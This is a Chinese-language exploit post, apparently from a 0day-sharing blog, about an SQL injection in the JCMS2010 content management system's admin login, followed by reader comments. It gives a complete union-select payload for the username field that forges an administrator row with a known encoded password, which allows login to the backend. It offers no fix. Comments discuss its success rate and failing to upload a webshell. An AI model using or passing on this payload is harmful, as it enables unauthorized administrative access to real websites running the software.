大汉版通JCMS内容管理系统SQL注射漏洞

简要描述:

大汉版通JCMS内容管理系统某处参数未经处理即入库查询导致SQL注射漏洞产生,可利用来登录后台等,当前测试存在该漏洞的版本为JCMS2010。

详细说明:

1. 大汉版通JCMS内容管理系统(JCMS2010)默认后台登录页中由于用户名未经处理即带入数据库查询产生SQL注射漏洞。

2. 利用测试:

后台登录页:http://0day5.com/jcms/

用户名:
[php]x' union select '00000','admin','AEY=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--
[/php]
密码:1

其中'00000'是验证管理员用户组的一个字段;'admin'是管理员用户名;'AEY='加密密码,解密后为'1';后面的'1'表示帐号启用。

6 条评论

  1. 独自等待

    成功率相当的低吧?

    1. 0day5
      @独自等待

      成功率比较低~

  2. 新手菜鸟

    请问是在地址栏里面提交吗?还是在登录哪里?求解,。新手

    1. 0day5
      @新手菜鸟

      后台登录处`

  3. 淮府科技

    哈哈 能用 但是不能传马

    1. 0day5
      @淮府科技

      嘿嘿~

发表评论